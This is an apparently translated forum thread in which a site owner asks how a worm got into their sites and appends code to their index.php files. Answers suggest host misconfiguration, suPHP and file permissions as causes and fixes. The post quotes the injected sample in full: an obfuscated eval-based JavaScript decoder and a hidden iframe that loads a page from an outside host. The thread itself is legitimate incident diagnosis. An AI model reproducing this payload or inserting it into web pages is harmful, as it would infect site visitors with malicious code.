最近还有人见过这种情况吗?我有几个网站因为这个错误而瘫痪了。
Parse error: syntax error, unexpected '<' in /home/public_html/index.PHP on line 39
它是由蠕虫/注入攻击引起的,它会在它能够找到的任何 index.php / index.html 文件中随机转储以下代码:
<!--
  Quoted sample of the injected block, kept verbatim for analysis. Do not serve it or open it in a browser.
  What the visible code does:
  * gserkewg() is not defined anywhere in this snippet, so the call throws and the catch branch
    sets k to new Boolean().toString(), i.e. "false".
  * ar2 is a text list of numbers; its leading "f" (k.substr(0,1)) is swapped for "[" so that the
    text becomes an array literal.
  * pau turns into "rn eval" only when getFullYear()-1 equals 2010, i.e. the client clock reads 2011;
    new Function("","retu"+pau) then hands back a reference to eval. With any other year the text
    stays "rn ev2010", so the decoder presumably stops on an undefined name.
  * parseInt(k.replace("false","0asd")) evaluates to 0, so each loop step only adds ar2[i]/3 to a
    running offset into the alphabet string ar and appends the character found there to s.
  * The assembled string s is passed to eval. According to the post, the decoded code inserts the
    hidden iframe quoted further down the page.
  The line break inside the ar2 string is presumably a paste artifact of the page.
  Cleanup hint: search index.php / index.html files under the web roots for markers visible here,
  such as the gserkewg call or the "retu"+pau concatenation.
-->
<html><body><script>date=new Date();var ar="Aw'zg>lpNu1m<0]c;erCy,aTnhE={s}i B() :[.\"ofbvdt/";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f108,0,-15,33,-30,6,33,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,-6,12,-75,-54,99,9,-75,3,63,-21,24,0,0,-15,33,-72,12,-33,18,3,48,3,-57,60,0,-18,6,-45,-33,69,-36,45,-12,24,0,0,27,-12,-78,-18,6,18,21,66,-21,-114,51,39,45,-87,51,18,-84,57,33,-72,12,-33,18,45,-9,-33,-9,36,-75,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,90,-93,90,42,3,-63,6,-75,24,9,-33,90,-21,-24,42,-81,63,63,-57,-75,24,9,-33,90,-9,51,-78,-42,33,30,-75,126,-39,-6,6,36,-36,-75,75,45,-78,51,-36,18,42,0,-84,21,-24,-27,102,-36,6,45,-45,30,-51,39,-45,63,-42,36,-105,9,111,-87,-3,-30,33,75,12,-27,-72,9,90,-15,-102,90,-72,9,-42,9,21,105,-48,33,-72,12,-33,18,-36,105,-15,-57,60,0,-18,18,0,18,-99,45,-27,93,-45,30,-51,24,-3,33,-72,12,-33,18,3,48,3,-21,24,0,0,24,-66,-12,42,30,-30,-15,15,39,-12,-78,-18,6,18,21,66,-21,-72,9,-3,15,72,-87,27,-60,33,-18,18,21,66,-36,-96,87,33,-72,12,-33,18,-45,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,81,-33,-9,-39,57,-57,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,99,-57,78,-9,-30,51,-78,-42,33,66,15,-39,-6,6,36,-36,-75,75,45,-78,21,-75,69,18,42,0,-84,21,-66,42,78,-9,-30,51,-78,-42,33,66,-96,102,-36,6,45,-45,30,-51,9,-75,60,63,-42,36,-105,9,111,-87,-45,42,78,-9,-30,51,-78,-42,33,66,-99,33,75,12,-57,-75,33,-33,42,78,-9,-30,51,-78,-42,33,66,21,-15,-102,60,-75,33,-33,42,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,-3,90,42,3,-63,-69,57,-57,24,9,-33,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,69,-24,42,-81,63,63,-132,57,-57,24,9,-33,99,-57,60,0,0,27,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,
-6,12,-75,-54,99,9,-75,3,75,-51,-45,0,30,21,63,-78,18,18,-75,117,-33,24,-21,-57,60,0,-18]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}e(s);</script></body></html>
该代码会盲目地插入一个 iframe,用来加载外部的 JavaScript 来源:
<iframe height="10" width="10" src="http://counterstats.cz.cc/counter.htm" style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;"></iframe>
我曾尝试破解该网站以查看这是如何发生的,但有人知道这是什么具体的攻击以及它是如何传播的吗?是未修补的漏洞代码、CPanel 本身、破解的密码还是被 root 的服务器?
编辑
我无法准确确定这里发生了什么,但看起来这是 CPanel 的问题 - 更改 CPanel 中的所有密码似乎可以阻止重复攻击。我让一个不重要的网站处于这种状态(没有清理网站代码),它完全没问题,而之前它每天都会受到破坏。就此事联系了 UK2.net 和 JustHost,但到目前为止没有回复。
似乎 public_html 文件夹和其他一些“系统”文件夹的权限也被奇怪地 chmod 过——出现了许多 777 权限。到目前为止,主机商仍未对此做出回应。
编辑
似乎是“Trojan.JS.Agent.bur”,我正在尝试了解更多信息……
答案1
听起来您的网站已经成为蠕虫的受害者,该蠕虫正在将 HTML/代码注入您的文件中。下次发布相关代码,以便对其进行分析。与此同时,您应该确保您的所有应用程序和系统库都已安装最新的安全补丁。
答案2
您正在运行共享托管环境,还是您是客户?
可能发生的情况是,服务器以同一个用户身份运行每个用户的代码(可能是“apache”或“httpd”)。这样一来,只要这台机器上任何一位客户有一个易受攻击的脚本,所有人基本上就都被入侵了。
如果您不是此服务器的操作员,您能做的很少。您可以尝试将所有内容都 chmod 为 755,并确保所有内容的所有者是您的用户,而不是“apache”或“nobody”。但是,这只能阻止您的文件被修改。攻击者仍然有可能读取您的所有文件(例如,您的数据库凭据)。除非您可以说服您的主机商改用 suPHP 或类似方案,否则我强烈建议尽快寻找另一家主机商。
如果您是主机,请重建 apache(使用 easyapache),并启用 suPHP 选项。然后您需要将每个用户的文件 chown 设置为由其自己的用户所有,然后 chmod 755。suPHP 将以每个用户自己的用户身份运行每个用户的代码,这将防止此类攻击。
答案3
它要么是通过 SQL 注入被注入到您网站的数据库中,要么是通过在线文件管理器上传/利用的。我见过这种情况发生过很多次,通常当它存在于所有文件中时,它是通过基于 Web 的文件管理器执行的。
不用说,由于您还没有收到主机商的回复,我会开始寻找一家新公司。
您很可能只能进行手动清理,除非他们(您也同意)恢复最近的干净副本。鉴于他们的响应速度缓慢,我仍会考虑换一家公司。